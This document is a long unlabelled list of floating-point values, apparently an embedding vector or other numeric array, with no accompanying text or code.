0.00938828382641077, 0.021815387532114983, 0.013486510142683983, 0.008008268661797047, 0.002650256035849452, 0.012803472578525543, -0.022386910393834114, -0.0063146138563752174, 0.0186232328414917, 0.014650462195277214, 0.022540245205163956, 0.0029377592727541924, -0.05174359306693077, 0.03233974426984787, 0.016588058322668076, -0.00676067965105176, -0.03942103311419487, -0.038222234696149826, 0.02347419410943985, -0.02475663274526596, -0.026554834097623825, 0.021411141380667686, -0.008203422650694847, 0.005011266563087702, -0.0054120286367833614, -0.028659705072641373, -0.014873494394123554, 0.0031224582344293594, 0.05138116329908371, -0.0027582875918596983, 0.046669598668813705, -0.016797151416540146, -0.01912505552172661, 0.013855908066034317, 0.018553534522652626, -0.02612270787358284, 0.006426130421459675, -0.02507724240422249, 0.013667724095284939, -0.014957131817936897, -0.0419580303132534, 0.05759819969534874, 0.024352384731173515, 0.005948700942099094, -0.005021721124649048, 0.01767534390091896, 0.0018557020230218768, -0.024296628311276436, 0.008280090056359768, 0.014239245094358921, -0.03465370833873749, -0.021355383098125458, 0.008203422650694847, 0.019375968724489212, -0.018665051087737083, -0.01340287271887064, 0.00999465398490429, -0.017856556922197342, -0.000047045963583514094, -0.0007000265177339315, 0.027154233306646347, -0.020156582817435265, 0.0359361469745636, -0.014552885666489601, 0.03314824029803276, 0.009736772626638412, -0.021076591685414314, 0.008077966049313545, 0.005607182160019875, 0.014106819406151772, 0.01865111105144024, 0.000534930033609271, -0.01591896079480648, -0.027335448190569878, -0.011430427432060242, -0.03579675406217575, 0.023585710674524307, 0.00676067965105176, 0.010844966396689415, 0.0048927804455161095, 0.024700874462723732, -0.005269147921353579, -0.00299003254622221, 0.01984991319477558, -0.013347114436328411, -0.020477192476391792, 0.020031126216053963, -0.022888733074069023, -0.019808093085885048, -0.007422808092087507, -0.01794019527733326, 0.03312036022543907, 0.008084936067461967, 0.015375318005681038, -0.007415838073939085, 0.004958993289619684, 0.05609273165464401, -0.012120435014367104, -0.0046383836306631565, 0.008050087839365005, -0.03799920156598091, 0.01576562598347664, 0.0209790151566267, -0.015166224911808968, -0.009513739496469498, 0.031168824061751366, 0.011723157949745655, 0.002043885877355933, 0.001135201775468886, -0.01830262318253517, -0.019557181745767593, -0.012684985995292664, 0.004533837083727121, -0.03498825803399086, -0.05982852727174759, -0.04438351094722748, 0.009590406902134418, 0.04245985671877861, 0.0005793623276986182, -0.019766274839639664, -0.02056082896888256, 0.002411541296169162, -0.02074204385280609, 0.0015795247163623571, -0.008781913667917252, 0.015960779041051865, -0.0006712762406095862, 0.00441883597522974, 0.03459795191884041, 0.014385610818862915, 0.0031329127959907055, -0.0016065326053649187, 0.0287154633551836, 0.040536198765039444, 0.016908667981624603, -0.01325650792568922, 0.009409192949533463, 0.028311217203736305, -0.03367794305086136, -0.025802098214626312, 0.03097366914153099, 0.005446877330541611, -0.012580439448356628, 0.004823082592338324, -0.005875518545508385, -0.020574769005179405, 0.005269147921353579, -0.040508318692445755, 0.008600699715316296, 0.02258206345140934, -0.0506284274160862, 0.028325155377388, -0.005098388530313969, -0.015723807737231255, 0.029774868860840797, -0.008036147803068161, -0.04429987445473671, 0.014225305989384651, -0.02567664161324501, 0.024742692708969116, -0.0009827379835769534, -0.010036472231149673, -0.010594054125249386, -0.0012693698517978191, -0.06434494256973267, -0.010482538491487503, -0.01662987843155861, 0.020072944462299347, -0.015431076288223267, 0.02746090479195118, -0.038724057376384735, -0.025160878896713257, 0.025119060650467873, -0.04692050814628601, -0.01731291599571705, 0.004613989498466253, 0.0016230858163908124, 0.006513252388685942, -0.005816275253891945, -0.012071645818650723, -0.024854209274053574, 0.004370047245174646, 0.01925051212310791, 0.012531651183962822, -0.0015577442245557904, -0.01304741483181715, 0.047533851116895676, -0.00330192968249321, 0.0029830627609044313, 0.009987683966755867, 0.009590406902134418, -0.00992495659738779, -0.007820084691047668, -0.03663312643766403, 0.012949837371706963, 0.0041992878541350365, -0.02339055761694908, 0.026429377496242523, -0.039225880056619644, -0.0014627809869125485, 0.04683687165379524, -0.015277741476893425, -0.016476541757583618, 0.021466899663209915, -0.005927791818976402, 0.007387958932667971, 0.002786166500300169, -0.013186809606850147, -0.019473545253276825, 0.019236572086811066, -0.026903321966528893, -0.0553399957716465, -0.03526705130934715, 0.005007781554013491, -0.008795852772891521, -0.013040444813668728, -0.018163228407502174, 0.0026572258211672306, -0.015124406665563583, -0.013347114436328411, 0.013556207530200481, -0.0129846865311265, 0.011200424283742905, -0.022888733074069023, -0.001564714009873569, 0.03501613810658455, 0.000832452205941081, 0.04962478205561638, -0.02074204385280609, -0.009625256061553955, 0.011311940848827362, -0.014134698547422886, -0.012252860702574253, -0.04834234341979027, 0.018163228407502174, 0.023613588884472847, -0.005363239906728268, 0.00691052945330739, 0.051520559936761856, -0.023934198543429375, 0.002575330901890993, -0.00046479669981636107, 0.0041818637400865555, -0.00965313520282507, -0.022693580016493797, -0.017563827335834503, 0.010580115020275116, 0.021466899663209915, -0.021355383098125458, -0.0017685798229649663, -0.01883232593536377, -0.010364051908254623, 0.030248813331127167, -0.0019184299744665623, -0.008001298643648624, 0.03055548295378685, -0.04151196405291557, -0.01353529840707779, 0.006401736289262772, -0.019738396629691124, 0.021648114547133446, 0.023822681978344917, 0.011012240312993526, 0.008907369337975979, 0.008426454849541187, -0.02764211781322956, -0.016058355569839478, 0.009304646402597427, -0.016351087018847466, -0.06785770505666733, -0.0015167967649176717, 0.045359279960393906, 0.002744348021224141, 0.02168993279337883, 0.02520269714295864, -0.014141668565571308, -0.02672210894525051, -0.007868872955441475, 0.013793179765343666, 0.010907693766057491, -0.027781514450907707, 0.018637172877788544, -0.0364658497273922, -0.020491130650043488, 0.013855908066034317, 0.008112815208733082, -0.019375968724489212, -0.011332849971950054, -0.0014523264253512025, 0.04968053847551346, -0.005317936651408672, 0.011994978412985802, -0.03217247128486633, 0.003125943010672927, -0.02415723167359829, 0.013333175331354141, -0.01523592323064804, -0.04262712970376015, -0.030025780200958252, -0.004600049927830696, 0.025119060650467873, -0.007171895820647478, -0.03844526410102844, 0.02766999788582325, 0.03621494024991989, -0.001064632786437869, -0.056650310754776, 0.01987779140472412, 0.024714814499020576, 0.036131300032138824, 0.012747714295983315, 0.005669909995049238, -0.025760279968380928, -0.02287479303777218, 0.036549486219882965, 0.043658655136823654, 0.00009931925887940452, 0.025955433025956154, -0.007938571274280548, -0.01251074206084013, 0.02814394235610962, -0.0031642767135053873, -0.07008803635835648, -0.017368674278259277, 0.01972445659339428, -0.01338893361389637, -0.004676717333495617, 0.012448013760149479, -0.0024986634962260723, -0.023125706240534782, 0.017954133450984955, 0.008036147803068161, -0.04254349321126938, -0.013974393717944622, 0.05227329581975937, 0.0004961607046425343, -0.010238596238195896, -0.0015124406199902296, -0.028882738202810287, -0.014566824771463871, 0.028325155377388, 0.029886385425925255, 0.029468199238181114, -0.005983549635857344, -0.0016413814155384898, 0.0007148372824303806, -0.019835973158478737, -0.019612940028309822, 0.030220933258533478, -0.0089840367436409, -0.03401248902082443, 0.035239171236753464, -0.006450524553656578, -0.008544941432774067, -0.05441998317837715, -0.017006244510412216, 0.00584763940423727, -0.0003881292068399489, -0.012782563455402851, 0.005659455433487892, -0.0003628637932706624, 0.0030579876620322466, 0.05637152120471001, -0.026164526119828224, 0.00809190608561039, 0.05104661360383034, -0.004540807101875544, 0.011444366537034512, -0.036577366292476654, -0.06138975918292999, 0.011395578272640705, 0.027112415060400963, -0.020992955192923546, -0.009039795026183128, 0.015445016324520111, 0.0015838808612897992, 0.011311940848827362, -0.01886020414531231, 0.0009783818386495113, -0.001605661353096366, 0.021466899663209915, 0.000015899793652351946, -0.008656457997858524, 0.0671328529715538, -0.0063982512801885605, -0.014288034290075302, 0.01877656765282154, -0.03328763321042061, -0.010440719313919544, -0.02208023890852928, -0.019473545253276825, -0.020212341099977493, 0.011193455196917057, -0.006558556109666824, -0.0009783818386495113, 0.028492430225014687, -0.022247513756155968, -0.019362028688192368, 0.004683687351644039, 0.01912505552172661, 0.008802822791039944, 0.03365006297826767, -0.02368328720331192, 0.0013878559693694115, 0.012134374119341373, 0.008217361755669117, 0.008077966049313545, -0.007764326874166727, 0.02273539826273918, 0.034709468483924866, -0.013786210678517818, -0.002554421778768301, -0.00972980260848999, 0.008698276244103909, 0.021104471758008003, -0.004725506063550711, -0.010789208114147186, 0.002078734803944826, -0.0296354740858078, -0.006642193533480167, -0.007227654103189707, -0.005917336791753769, -0.02365540899336338, 0.024937845766544342, -0.023432375863194466, 0.007910692133009434, -0.0019184299744665623, -0.01925051212310791, 0.009869198314845562, -0.014873494394123554, -0.014789857901632786, 0.008182513527572155, -0.026108767837285995, 0.0036277666222304106, 0.006227491889148951, -0.01651836186647415, 0.0014531975612044334, 0.018135348334908485, 0.008447364903986454, -0.024143291637301445, 0.004850961733609438, -0.003498825943097472, 0.012615288607776165, 0.00045085715828463435, -0.05411331355571747, -0.046307168900966644, 0.012817411683499813, -0.01919475384056568, -0.008865551091730595, 0.014594703912734985, -0.015849262475967407, -0.01933414861559868, 0.021759631112217903, 0.019389906898140907, 0.032980963587760925, -0.034709468483924866, 0.030360329896211624, -0.05542363226413727, -0.019682638347148895, 0.057319410145282745, -0.00992495659738779, -0.023836622014641762, -0.0016413814155384898, -0.017382612451910973, 0.00658992026001215, -0.006269310601055622, -0.01725715771317482, 0.003725343383848667, 0.00238017737865448, 0.012022857554256916, 0.031057307496666908, -0.002348813461139798, 0.0060323383659124374, 0.01380711980164051, 0.040480438619852066, -0.010538295842707157, 0.009855258278548717, 0.032116711139678955, -0.0039030727930366993, -0.0005427710711956024, -0.0260948296636343, -0.0009444041643291712, 0.029496077448129654, -0.012998625636100769, 0.0002964331360999495, 0.013702573254704475, 0.018943842500448227, 0.022651761770248413, 0.03192155808210373, 0.004425805527716875, 0.014873494394123554, -0.0263596810400486, -0.017034124583005905, 0.0348767414689064, -0.03328763321042061, -0.01904141902923584, -0.01407197117805481, 0.002639801474288106, 0.007931601256132126, -0.012650137767195702, 0.00904676504433155, -0.005791881121695042, -0.0018138833111152053, -0.009792530909180641, 0.0002744348021224141, 0.01752200908958912, 0.022261453792452812, -0.006952348165214062, -0.020867498591542244, -0.019612940028309822, 0.012427104637026787, 0.06105520948767662, 0.036967672407627106, 0.00036569524672813714, 0.007847963832318783, -0.014120759442448616, -0.005509605165570974, 0.02585785649716854, -0.017926255241036415, 0.013834998942911625, -0.0016126311384141445, 0.0002461200929246843, 0.025871796533465385, 0.008607668802142143, 0.011590732261538506, -0.014329852536320686, -0.024979665875434875, -0.01483167614787817, -0.0009478890569880605, 0.019654758274555206, 0.03936527669429779, -0.0016431239200755954, -0.0018365350551903248, 0.0026694228872656822, 0.004153984598815441, 0.0025944977533072233, -0.03005366027355194, -0.009290707297623158, -0.004781263880431652, -0.01529168151319027, 0.02638755924999714, -0.022275393828749657, 0.00919312983751297, -0.006544616539031267, 0.005753547418862581, 0.010977392084896564, 0.01170921791344881, 0.010120109654963017, 0.02037961594760418, -0.022275393828749657, 0.008182513527572155, 0.006213552318513393, -0.010559205897152424, -0.02308388613164425, 0.01096345204859972, 0.032060954719781876, 0.0014671371318399906, -0.002955183619633317, 0.008928278461098671, 0.005994004663079977, -0.02879909984767437, -0.0020020671654492617, 0.00042450270848348737, -0.01551471371203661, -0.000684780185110867, -0.02838091365993023, 0.007401898503303528, 0.0029795777518302202, -0.004488533362746239, 0.009374343790113926, 0.008956157602369785, -0.02320934273302555, 0.028882738202810287, -0.0372464656829834, -0.05982852727174759, -0.007903722114861012, -0.07477171719074249, 0.022707520052790642, 0.019557181745767593, -0.008537971414625645, -0.0027739694342017174, 0.019417786970734596, 0.006311129312962294, 0.006429615430533886, 0.03769253194332123, 0.026708168908953667, -0.007137047126889229, -0.0043665627017617226, -0.012775593437254429, 0.014246215112507343, -0.02171781100332737, -0.01109587773680687, -0.008133724331855774, -0.009262828156352043, -0.00643309997394681, -0.0022843428887426853, -0.0037985260132700205, -0.009032825008034706, 0.010036472231149673, -0.013186809606850147, 0.009053735062479973, -0.028520310297608376, -0.00027508821221999824, -0.004544291645288467, -0.0005144563619978726, 0.022066300734877586, -0.0024080565199255943, -0.0031172307208180428, 0.01773110218346119, 0.02562088333070278, -0.005903397221118212, 0.020477192476391792, 0.03905860707163811, -0.0034186735283583403, 0.020519010722637177, -0.004460654687136412, -0.025146938860416412, -0.005568848457187414, 0.005446877330541611, -0.009708893485367298, 0.018943842500448227, -0.031140943989157677, -0.029384560883045197, 0.044968973845243454, -0.040508318692445755, -0.02918940782546997, 0.03158700838685036, 0.01728503592312336, -0.019822033122181892, -0.044522907584905624, -0.008064026944339275, -0.004732475616037846, 0.043240468949079514, -0.04031316563487053, -0.007757356856018305, 0.005955670494586229, -0.01618381217122078, 0.007527354639023542, -0.04390956833958626, 0.024659056216478348, 0.028882738202810287, 0.012357407249510288, 0.010113139636814594, 0.005502635613083839, 0.0026032100431621075, 0.011883462779223919, 0.0029116226360201836, 0.04736657440662384, -0.025216637179255486, 0.01041284017264843, -0.005234299227595329, -0.03362218290567398, 0.0020682800095528364, 0.015528653748333454, 0.008593729697167873, -0.01143739651888609, -0.014859555289149284, 0.010956482961773872, -0.026192406192421913, 0.006708406377583742, 0.012615288607776165, -0.004488533362746239, -0.0037079190369695425, -0.004004134330898523, 0.02617846615612507, -0.0069349235855042934, 0.0041992878541350365, -0.0506284274160862, 0.04298955947160721, -0.011855583637952805, 0.005042630713433027, -0.009304646402597427, -0.0020979016553610563, 0.01041284017264843, -0.004687171895056963, -0.009123432449996471, 0.020965076982975006, -0.01975233480334282, 0.005554908886551857, -0.03942103311419487, -0.027516663074493408, -0.011221334338188171, -0.010900724679231644, -0.00300919939763844, -0.016964426264166832, 0.026903321966528893, 0.01182770449668169, -0.0007871487177908421, 0.0054329377599060535, 0.025160878896713257, 0.008238270878791809, -0.004314289428293705, -0.01197406928986311, -0.016950486227869987, 0.027530601248145103, 0.0033942791633307934, -0.019473545253276825, 0.004680202342569828, 0.005042630713433027, -0.026025131344795227, -0.024505721405148506, -0.01594683900475502, 0.03417976573109627, 0.0033315513283014297, 0.029523957520723343, 0.02630392275750637, -0.014469248242676258, 0.0020020671654492617, -0.028102124109864235, 0.004310804419219494, 0.005297027062624693, 0.02969123236835003, 0.02496572583913803, 0.014399549923837185, 0.011256182566285133, 0.016713514924049377, -0.020546888932585716, -0.016964426264166832, 0.002840182278305292, -0.0087191853672266, -0.03144761547446251, 0.004864901304244995, -0.024003896862268448, -0.005227329675108194, -0.00035916108754463494, 0.016713514924049377, 0.03459795191884041, -0.011235273443162441, -0.04025740548968315, 0.011737097054719925, -0.009346464648842812, 0.005499150604009628, -0.004136560019105673, -0.009255858138203621, 0.025105120614171028, -0.048955682665109634, 0.011144666001200676, -0.005098388530313969, -0.005150661803781986, -0.0038926179986447096, 0.006178703624755144, -0.04831446334719658, 0.0017215338302776217, -0.028603946790099144, 0.0032583686988800764, 0.0018975206185132265, -0.02971911057829857, -0.04245985671877861, 0.01502683013677597, 0.0012083842884749174, -0.006035822909325361, -0.0009278510115109384, 0.002864576643332839, 0.014225305989384651, 0.015960779041051865, 0.022540245205163956, -0.008593729697167873, 0.01734079420566559, -0.009834349155426025, 0.00043103686766698956, 0.017661403864622116, -0.018888084217905998, -0.014650462195277214, -0.02677786722779274, -0.0034430676605552435, -0.006990681868046522, -0.021020833402872086, 0.01651836186647415, -0.027363328263163567, -0.02546754851937294, 0.02037961594760418, 0.031224582344293594, -0.0010916406754404306, -0.03852890431880951, -0.010768298991024494, 0.05168783292174339, -0.019320210441946983, -0.003315869253128767, 0.03903072699904442, -0.00317995878867805, 0.021257806569337845, -0.027335448190569878, 0.02674998715519905, 0.013883787207305431, 0.03359430283308029, 0.02674998715519905, 0.029050013050436974, -0.016434723511338234, -0.028687583282589912, -0.004087771754711866, -0.0320051945745945, 0.011855583637952805, -0.015988659113645554, 0.005460816901177168, -0.007604022044688463, 0.04527564346790314, -0.043212588876485825, 0.029830627143383026, 0.00987616740167141, 0.003749737748876214, 0.010384961031377316, -0.03621494024991989, -0.04466230422258377, -0.000470024038804695, 0.004509442951530218, 0.032507020980119705, -0.01291498914361, -0.012698926031589508, 0.012204071506857872, 0.0071196225471794605, -0.017173519358038902, -0.011653459630906582, -0.0059696100652217865, -0.03049972467124462, 0.004122620448470116, -0.025802098214626312, 0.005251723807305098, 0.0359361469745636, 0.0011587246553972363, -0.03490462154150009, -0.02562088333070278, 0.010594054125249386, -0.005718698259443045, -0.0301651768386364, 0.01523592323064804, -0.034709468483924866, -0.008586759679019451, -0.04042468219995499, -0.021606294438242912, 0.0033977641724050045, -0.02683362551033497, 0.014155608601868153, -0.012747714295983315, -0.013103172183036804, -0.01083102636039257, 0.016908667981624603, -0.025634823366999626, 0.016030477359890938, 0.013556207530200481, -0.011360729113221169, 0.012461953796446323, 0.02263782173395157, -0.024951785802841187, 0.014971071854233742, -0.01565410941839218, 0.006541131529957056, 0.006157794035971165, 0.012224981561303139, 0.020477192476391792, 0.019403846934437752, -0.029970021918416023, 0.01964082010090351, -0.0049764178693294525, -0.008949188515543938, -0.0010010335827246308, 0.005297027062624693, -0.02817182056605816, 0.021327504888176918, 0.02588573470711708, 0.008454333990812302, 0.004889295436441898, -0.01550077460706234, 0.02853424847126007, 0.04206954687833786, -0.009499800391495228, 0.031168824061751366, -0.0007531710434705019, 0.011702247895300388, 0.00612991489470005, -0.042710766196250916, 0.044021084904670715, 0.0039344364777207375, 0.0014619098510593176, 0.023752985522150993, -0.016797151416540146, -0.01530562061816454, -0.015152285806834698, -0.002300024963915348, 0.011716187931597233, -0.027237871661782265, 0.004512927960604429, 0.022832974791526794, 0.004596564918756485, 0.010433749295771122, -0.02326510101556778, -0.012106494978070259, -0.01883232593536377, -0.004032013472169638, 0.020184461027383804, -0.02787909097969532, -0.028339095413684845, 0.01338893361389637, -0.02612270787358284, -0.0087191853672266, 0.026317860931158066, 0.015570471994578838, -0.013172870501875877, -0.002739120740443468, -0.0348767414689064, -0.022596003487706184, 0.0031590494327247143, 0.009032825008034706, -0.010761328972876072, 0.00537020992487669, 0.03710706904530525, -0.006983712315559387, 0.02410147339105606, -0.013570147566497326, 0.006830377038568258, 0.009513739496469498, -0.02567664161324501, -0.03493250161409378, -0.008029177784919739, -0.03615918010473251, -0.022414788603782654, 0.02740514650940895, 0.05843457207083702, 0.002075249794870615, -0.008907369337975979, 0.016462603583931923, -0.015054709278047085, 0.008022208698093891, 0.0250493623316288, 0.0019829003140330315, -0.028018485754728317, -0.013904696330428123, 0.0056141517125070095, 0.01258740946650505, 0.06467948853969574, -0.034765224903821945, -0.005415513180196285, 0.034737348556518555, -0.007297351956367493, -0.050656307488679886, 0.0032723082695156336, 0.021550536155700684, -0.01529168151319027, -0.04310107231140137, 0.0005279603064991534, -0.03847314417362213, -0.011005271226167679, 0.0011674369452521205, 0.007813114672899246, 0.00029926461866125464, 0.011186485178768635, 0.008475243113934994, 0.010928603820502758, 0.014985010959208012, -0.00876100454479456, -0.013639844954013824, 0.02260994166135788, -0.0049938419833779335, 0.021912965923547745, -0.0020177492406219244, 0.018525656312704086, -0.006011428777128458, 0.01817716658115387, 0.011360729113221169, 0.010175867937505245, 0.03727434575557709, -0.025983313098549843, 0.022540245205163956, 0.027948787435889244, -0.00961131602525711, -0.010182837955653667, 0.010775268077850342, -0.029914263635873795, -0.03362218290567398, -0.0071997749619185925, 0.0002746526151895523, -0.03627069666981697, -0.023697227239608765, 0.008001298643648624, 0.05882488191127777, -0.003134655300527811, -0.002415026305243373, 0.0022878278978168964, 0.013751361519098282, 0.005784911103546619, 0.012838320806622505, 0.004910205025225878, -0.00679901335388422, 0.01725715771317482, 0.036911915987730026, 0.013500449247658253, -0.015612291172146797, 0.018372321501374245, 0.010559205897152424, -0.00458959536626935, 0.0025892704725265503, -0.023613588884472847, 0.018720809370279312, 0.006025368347764015, 0.0017014957265928388, 0.014845616184175014, 0.022303272038698196, -0.03008153848350048, 0.033399149775505066, 0.0002805333351716399, 0.008907369337975979, -0.006077641621232033, -0.013458631001412868, 0.003329808823764324, -0.01799595355987549, 0.004080801736563444, 0.013165900483727455, -0.008830701932311058, 0.0005479983519762754, 0.021857207641005516, 0.005509605165570974, 0.015542592853307724, 0.011047089472413063, -0.0019776730332523584, 0.00822433177381754, 0.003031851025298238, -0.005418998189270496, -0.017856556922197342, -0.0067537096329033375, -0.019027478992938995, 0.011834673583507538, -0.012782563455402851, 0.012127404101192951, -0.007854933850467205, -0.004230652004480362, -0.01251074206084013, 0.009917986579239368, 0.01898566074669361, -0.005516575183719397, 0.007743417285382748, 0.012531651183962822, 0.027502723038196564, 0.00797341950237751, -0.01594683900475502, -0.008273120038211346, -0.008029177784919739, -0.042738646268844604, -0.0022669185418635607, 0.0022425244096666574, 0.008147664368152618, -0.043993204832077026, 0.00609158119186759, -0.026526954025030136, 0.016030477359890938, -0.0038577690720558167, 0.02463117614388466, 0.00316079193726182, -0.003145109862089157, 0.018316563218832016, 0.016295328736305237, 0.021815387532114983, 0.0456380695104599, -0.020100824534893036, 0.003444810165092349, 0.038696177303791046, 0.018218984827399254, -0.009074644185602665, 0.0065794652327895164, 0.00986222829669714, 0.003937921486794949, -0.018678991124033928, -0.02790696918964386, 0.009011915884912014, -0.031085185706615448, 0.006879165768623352, -0.006056732498109341, 0.024659056216478348, -0.009639195166528225, 0.003634736407548189, 0.024463901296257973, 0.03983921930193901, -0.01764746382832527, -0.006851286627352238, -0.005499150604009628, 0.020937196910381317, -0.01373045239597559, 0.018790507689118385, -0.012538621202111244, 0.013486510142683983, 0.0022773731034249067, 0.02442208305001259, 0.014525006525218487, 0.032980963587760925, 0.0050844489596784115, -0.020714163780212402, -0.009660105220973492, 0.011416487395763397, 0.0021414626389741898, 0.0012946352362632751, -0.015542592853307724, 0.02523057721555233, 0.003174731507897377, -0.0037985260132700205, -0.0333155132830143, -0.02249842695891857, -0.03537856414914131, 0.023334799334406853, -0.03710706904530525, 0.006088096182793379, -0.019947489723563194, -0.0055409693159163, -0.007604022044688463, 0.00523778423666954, -0.000010223240678897128, 0.01304741483181715, 0.02029597759246826, 0.00958343781530857, -0.027446964755654335, 0.00972980260848999, -0.009555558674037457, -0.003110260935500264, 0.011744067072868347, -0.015640169382095337, 0.002246009185910225, -0.018790507689118385, -0.0012319072848185897, 0.019403846934437752, 0.02053295075893402, 0.003005714388564229, 0.002995259827002883, 0.01791231520473957, -0.030834274366497993, 0.017577767372131348, 0.021243866533041, -0.0021815388463437557, -0.004011104349046946, 0.02457541786134243, -0.003246171632781625, -0.010029503144323826, 0.006903559900820255, 0.013312266208231449, 0.026234224438667297, -0.027809392660856247, -0.012705895118415356, -0.012427104637026787, 0.012364376336336136, 0.010858905501663685, 0.01633714698255062, 0.003871708642691374, 0.02287479303777218, -0.0036765551194548607, -0.039671946316957474, -0.02431056648492813, -0.012998625636100769, 0.017326854169368744, 0.010440719313919544, -0.007112652994692326, 0.008767973631620407, 0.013918636366724968, 0.018455957993865013, 0.01048950757831335, -0.00044345177593640983, 0.007067349273711443, -0.028938496485352516, 0.002049113158136606, 0.005108843557536602, -0.014943192712962627, -0.010865875519812107, 0.02523057721555233, -0.05982852727174759, 0.017452310770750046, -0.0023122220300137997, -0.011263152584433556, 0.010343142785131931, 0.0023017674684524536, 0.030276691541075706, -0.0012092555407434702, -0.03866829723119736, 0.018372321501374245, -0.04193015396595001, 0.0007753872196190059, 0.017926255241036415, -0.003519735299050808, 0.003444810165092349, -0.006178703624755144, 0.002890713280066848, 0.017577767372131348, 0.000719629053492099, -0.00377064710482955, -0.039560429751873016, 0.0004231958882883191, -0.006743255071341991, 0.02594149298965931, -0.010844966396689415, -0.011332849971950054, -0.006523707415908575, -0.014901373535394669, 0.028938496485352516, -0.001319900737144053, -0.00023087371664587408, 0.005457331892102957, -0.03178216144442558, 0.017772920429706573, 0.02032385766506195, -0.01901353895664215, -0.0292451661080122, -0.012197102420032024, 0.018692929297685623, -0.01386287808418274, -0.012566500343382359, 0.031168824061751366, 0.004115650895982981, 0.001655320986174047, 0.008579789660871029, -0.01916687563061714, -0.011723157949745655, -0.005021721124649048, -0.0002210724778706208, -0.012782563455402851, -0.008537971414625645, 0.0031729890033602715, -0.009701923467218876, 0.014971071854233742, -0.007185835391283035, 0.00662825396284461, -0.02969123236835003, -0.027182113379240036, 0.019473545253276825, -0.006875680759549141, -0.00025505010853521526, -0.006056732498109341, -0.006122945342212915, 0.009792530909180641, 0.008816762827336788, -0.004715051036328077, 0.02541179023683071, 0.015807444229722023, -0.003524962579831481, -0.024031776934862137, -0.0039274669252336025, 0.026610592380166054, -0.01403015200048685, 0.00377064710482955, -0.02412935346364975, 0.0010454659350216389, -0.01788443699479103, -0.01639290526509285, -0.011109817773103714, -0.025119060650467873, 0.0016736167017370462, -0.016030477359890938, 0.020435374230146408, -0.028450611978769302, 0.011855583637952805, -0.010517386719584465, 0.022010542452335358, 0.003958831075578928, -0.008273120038211346, -0.041400451213121414, -0.00002112712354573887, -0.012043766677379608, 0.006889620330184698, 0.00008908240852179006, 0.008412515744566917, -0.0017842617817223072, 0.0500987246632576, 0.013974393717944622, -0.03774828836321831, -0.0024063140153884888, -0.0292451661080122, -0.0041818637400865555, -0.013653784990310669, 0.0005292671266943216, -0.04259924963116646, -0.01930627040565014, 0.011325880885124207, 0.0012824381701648235, 0.01020374707877636, -0.007325231097638607, 0.0015934642869979143, -0.016922608017921448, 0.009025855921208858, -0.009499800391495228, 0.011242243461310863, -0.007123107556253672, 0.04025740548968315, 0.028576068580150604, -0.004443230107426643, -0.030806394293904305, 0.0014331594575196505, 0.013946515507996082, -0.020700225606560707, 0.014044092036783695, 0.00023915032215882093, -0.011493154801428318, -0.008119785226881504, -0.02585785649716854, -0.015905020758509636, 0.0013277416583150625, -0.023348737508058548, -0.004450199659913778, 0.0022181300446391106, -0.01032223366200924, -0.005286572501063347, -0.005244753789156675, 0.019585061818361282, -0.025397852063179016, -0.016936548054218292, -0.012796502560377121, -0.013486510142683983, -0.013381963595747948, -0.00017544224101584405, -0.011514064855873585, 0.004317773971706629, 0.01665775664150715, 0.016044417396187782, 0.027056656777858734, 0.02460329793393612, 0.02008688449859619, 0.015877142548561096, 0.04017376899719238, 0.0006564654759131372, 0.020463252440094948, -0.03889133036136627, -0.005150661803781986, 0.011918311007320881, -0.016936548054218292, 0.034319158643484116, 0.02449178136885166, -0.0009086841018870473, 0.01291498914361, -0.018874144181609154, -0.012824381701648235, 0.0015133118722587824, 0.00407731719315052, 0.03010941855609417, -0.008670397102832794, 0.03222822770476341, -0.011165576055645943, 0.02029597759246826, 0.004202772863209248, -0.0027582875918596983, 0.013786210678517818, 0.016378965228796005, -0.0055409693159163, -0.0035929176956415176, -0.013165900483727455, 0.0014418717473745346, 0.003746252739802003, 0.024617236107587814, 0.005230814218521118, 0.019919609650969505, 0.00449201837182045, -0.0031468523666262627, 0.01600259728729725, -0.003578978357836604, 0.008182513527572155, -0.017689282074570656, 0.024951785802841187, 0.006722345482558012, 0.02766999788582325, -0.0021937359124422073, 0.012099524959921837, 0.02814394235610962, 0.012935898266732693, -0.026652410626411438, 0.009255858138203621, -0.031168824061751366, -0.010168897919356823, 0.005105358548462391, -0.009952835738658905, -0.008600699715316296, 0.0040912567637860775, 0.0009844803716987371, 0.016476541757583618, 0.0010097457561641932, 0.018762627616524696, 0.030220933258533478, 0.015556532889604568, -0.024714814499020576, 0.0019776730332523584, 0.005011266563087702, -0.005896427668631077, 0.01020374707877636, -0.00158039596863091, -0.010524356737732887, -0.00788281299173832, 0.014538945630192757, 0.04167924076318741, 0.030388208106160164, 0.00006594058504560962, 0.005851123947650194, 0.03398461267352104, 0.020184461027383804, 0.028910616412758827, -0.009764651767909527, -0.01550077460706234, -0.012343467213213444, -0.019348088651895523, -0.02352995239198208, -0.006541131529957056, -0.007346140220761299, -0.004955508280545473, -0.003256626194342971, 0.0036626155488193035, 0.00394140649586916, -0.034374918788671494, -0.03094579093158245, 0.017006244510412216, 0.022094178944826126, -0.0077294777147471905, 0.013967424631118774, -0.005380664486438036, -0.0027826817240566015, 0.0010062609799206257, 0.01169527880847454, -0.008391606621444225, 0.007074319291859865, 0.0018922932213172317, 0.00788281299173832, -0.01788443699479103, 0.0150825884193182, 0.004307319410145283, 0.00911646243184805, 0.00830099917948246, 0.003791556227952242, -0.014385610818862915, -0.0075552333146333694, -0.028311217203736305, -0.0025875282008200884, 0.01568198762834072, -0.0007126592681743205, -0.019417786970734596, -0.002829727716743946, 0.013096203096210957, 0.004394441843032837, 0.003335036104544997, 0.023976018652319908, 0.008997976779937744, 0.013577116653323174, -0.0006887006456963718, -0.014525006525218487, -0.019417786970734596, 0.014971071854233742, 0.03325975686311722, -0.011904371902346611, 0.02079780213534832, -0.001585623249411583, 0.007164926268160343, -0.006889620330184698, 0.0006129043758846819, -0.013828028924763203, -0.003910042345523834, 0.002875031204894185, -0.0018208530964329839, 0.0045373220928013325, 0.008391606621444225, -0.008447364903986454, 0.0063982512801885605, -0.015486834570765495, 0.020505070686340332, -0.006199612747877836, -0.017006244510412216, -0.020463252440094948, 0.010175867937505245, 0.001170050585642457, -0.0022285848390311003, -0.00028292922070249915, 0.009492830373346806, -0.020268099382519722, -0.011479215696454048, 0.00552005972713232, -0.01966869831085205, -0.009283737279474735, -0.021104471758008003, 0.01948748342692852, -0.005746577400714159, 0.002780939219519496, 0.015138345770537853, 0.004927629139274359, 0.02386450208723545, 0.02499360404908657, 0.010350112803280354, -0.00064252590527758, -0.010001624003052711, -0.0006181317148730159, 0.013695603236556053, -0.0073670498095452785, 0.0051680863834917545, -0.0010280414717271924, -0.016267448663711548, 